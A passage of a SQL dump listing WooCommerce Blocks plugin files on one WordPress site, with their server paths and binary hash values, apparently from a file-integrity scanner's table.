fL\'u(7vr;','',0,'?'),('zAX\"}k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ŧl`','xjĚI6,n*r','',0,'?'),('ƍi56:S6\'S:-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','εI}ДKZX','7wA/V8?me{Vc龁zfJH\r?','',0,'?'),(';zE|1iUo','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŕ~(eT>MFƏ%',')}Fǒp&\"nH?u&','',0,'?'),('m2(X?6/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!?.[+','2x|C&\rBSxһ̴','',0,'?'),('3E','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/support.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/support.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*!ĆJ%H8','Vh2Bv\r%ltqU\Zv\r','',0,'?'),('\r pg09.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yijƻ\\҇Q','ه2 L^Q\\y~tDP#\Z 2?','',0,'?'),('c8^-XL%Q','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s4\n1gEhYs','n?G8>v\0ZxLRk','',0,'?'),('skH{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \nK-d','CCY#G֭ >9O','',0,'?'),('EH ]mq<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߊW`d\n\0\\','s)劧:Kaڄ@zcz0','',0,'?'),(';Wac0q=b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/save.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/save.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' iȄ\Z','0^A#SK׫WI) ','',0,'?'),('\r\Zl@JoE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u^~gA:',' ݍ;y#Ibg\r\n.4*\n %b','',0,'?'),('W^4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#IJ {j5',';l\rJR\rPFM\04','',0,'?'),('0\nߩmW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/constants.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/constants.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J)f$\"\"Z','.׈[o$,@3kK` i%v< 5','',0,'?'),('_]= 3%','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a ԲpG6 Sf',' r@d^H\\JCcӕi','',0,'?'),('T%i`R|D-0Mp','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Wn=G\nIz6','\nru\0 (3դi{Bh','',0,'?'),('oIC\n \"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',AIC՜!','VE;ܬ[\'yk8b+r','',0,'?'),('mCx9#)cK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/support.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/support.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oˠ?+!/ab','O;bկ^fV2Bw6hZD','',0,'?'),('=j$PRh\ZP','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wċjف\Z','*CBqLL$|0n','',0,'?'),('2?|hP[ve+K','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/save.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/save.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ɖ(\'ݗ8sN ','Ѽd)Z =Euݜ','',0,'?'),('Y*rvE4̺','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/config.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/config.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%qV?VRx ;',' D0Caicoaf~z','',0,'?'),('a ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m2T\"','ג97.G5ϯ1%XZ.','',0,'?'),('QYݸf)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/product-selector.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/product-selector.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nQX>','3fN~)cr„\0;䏃SO\ZJIw?\\','',0,'?'),('<?ݳO4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J}`g 7$4','1x4{O\r!Ql! _ti:*I','',0,'?'),('qKV98#`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-template.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-template.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ЌO','X!:JNY#r%-','',0,'?'),('Yi\Z2ْ)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/with-product-selector.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/with-product-selector.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j5gt`','[5a$V\n>DAJRA~PBն','',0,'?'),('MG=W1r΍','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$j\'ZAf9Z ','Ds~ZLR6QWۡG&`-ZNX','',0,'?'),(')\'̣.ܸ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RxoC̛*\"y','ͩ>\0 Jϑl/;rZ','',0,'?'),(' 8\0isKn','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/constants.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/constants.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A.#B;ܔ yI:','Tp8k0A8\"ȗ7\\>GP','',0,'?'),(':Cl8IW%G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6J$R3W)v','\0è)ܧߏ2֍eDxib\07npG','',0,'?'),('莉oUޏW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E*ی<',' f^PRƧ[B\",7\'Td\\[','',0,'?'),('L+6; ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' U \'Lza\"^','>U5DzRdjk;\"KS< #ʚsJ','',0,'?'),('w1oa¾;E~},','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/supports.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/supports.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̩լS.c','NMF<_A8WWT9','',0,'?'),('ю%㆗~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rd3G\0(','POg[n_Log!G/m','',0,'?'),('`L7d=[V','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zicP0jކZ','orξ0q鯱SWx\"@j+(','',0,'?'),('qT,4HV*q\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 % ;gxk',' 5f\Z-Rq_xLEsLE̛J','',0,'?'),('ӱAJWH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/constants.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/constants.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D!ުDŽ','cR.?\\KQ,O>V ','',0,'?'),('G/m#ߙ?ҏ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0 \0|ӌ/+','S.j\\/AHC#ȖA','',0,'?'),('e9ة.f$DVn','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xf~|q','<)E\')+k\\Dᇘ*2 \"','',0,'?'),('[ʰcF,!PE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' b~9\r','\0w=ضNg\\j\'','',0,'?'),('z mL]VJ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/supports.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/supports.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̩լS.c','NMF<_A8WWT9','',0,'?'),('\Z[69 -J-3D0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?YZgTuMׇ','O\r)4o-2Hn1lE@|','',0,'?'),('Bb{ͳ{8jo<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y(;| hFEA-','\\\\XsGvN3ݭhA}','',0,'?'),('\"oihijvl','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4/BY=l--ߨ[f\r','`\\ M2?dKpxkSDv6','',0,'?'),('ڠk,G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/constants.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/constants.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m w\rԃ\'HSe','5\'?ur ;8fӝ9J\"k&','',0,'?'),('Wԕ+`n=`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ej&!\' `$Μ',' 䀁gp!,p]kۂo','',0,'?'),('8}*oよJ6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p8ܗ/&;',']{tOyZ?aWш*v','',0,'?'),('?}BӚ\ny','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z*׏vR','Ư4\Zl%6X1 ܾ.0','',0,'?'),(' gNy`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/save.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/save.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` ?ӥA~k\r','PR3=rSdD','',0,'?'),('DG;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U[yLqc','V.D5`ԛ2SEF ','',0,'?'),('bb ηtTq=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/supports.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/supports.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mɗ{Գ|','$ITm%Co3?Ꮖ=\rr=-L1P>','',0,'?'),('~\nOO[7k:n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wp8kjpб','NkB;ϱbo舓O\rR\'.H j&C','',0,'?'),('һP1Tw%','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n]L04mJ','ZyBR16+t+','',0,'?'),('!SD<^L','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/frontend.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/frontend.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('~u]Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'WJ~G','Cc9D S-VTRVpo.xֆ','',0,'?'),('\\=Ŷá\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/save.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/save.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` ?ӥA~k\r','PR3=rSdD','',0,'?'),('pՕ=AZOw','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o_jѫs! ',':64qS:.\\K, ','',0,'?'),('4h#G~ J4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/test/block.test.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/test/block.test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+hz;_','ehC\n_ 0>+VDeis','',0,'?'),('I4\"oiqT M','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hDøTT',']Z(e!$B OJ*ҽ','',0,'?'),('CC]ik*QJ{,;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/create-blocks-from-template.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/create-blocks-from-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Q \Z>3','G m0=T!j1%S([˭\0j+EY','',0,'?'),('.\nS_1\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/get-block-map.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/get-block-map.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(tK1H:d+b','91?vQe<Ҳ+(P#](','',0,'?'),('AC04e|br^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' eD+M-zWh','1j\' GT( 8VWFV*ݡ','w_%6V2JmmI__ܼN','',0,'?'),('RTՌSW[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/stories/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/stories/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' u1* ^O','\\Q\'8sU\rR4wJcj9','',0,'?'),(' y9^\r.Ŀf_+ F<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\Z~TY','}Fn2QUH\\z& D+D5\06','',0,'?'),('^^WiMF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/address-form.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/address-form.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YQp4unj','C!$x56} ɹ\"h\'if','',0,'?'),('Hx\r|z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/validate-shipping-country.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/validate-shipping-country.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{?T>',',qIGeA YUH&u,|','',0,'?'),('zܖ1YxdF,d','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/test/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/test/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','femݬ8,:\\\'',':ᴤ0g\"4X(ǘdnQfJB{','',0,'?'),('8g?4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ee( :j','Ryx1}qpޅ㔰vQ]','',0,'?'),('T (L\nlm^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/order-summary-item.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/order-summary-item.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nmؓ\0x\r',')&YI|o[&.`k_f','',0,'?'),('A3(,O','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=8@Lޱ6$%',':_\0 ໘\'9DBq 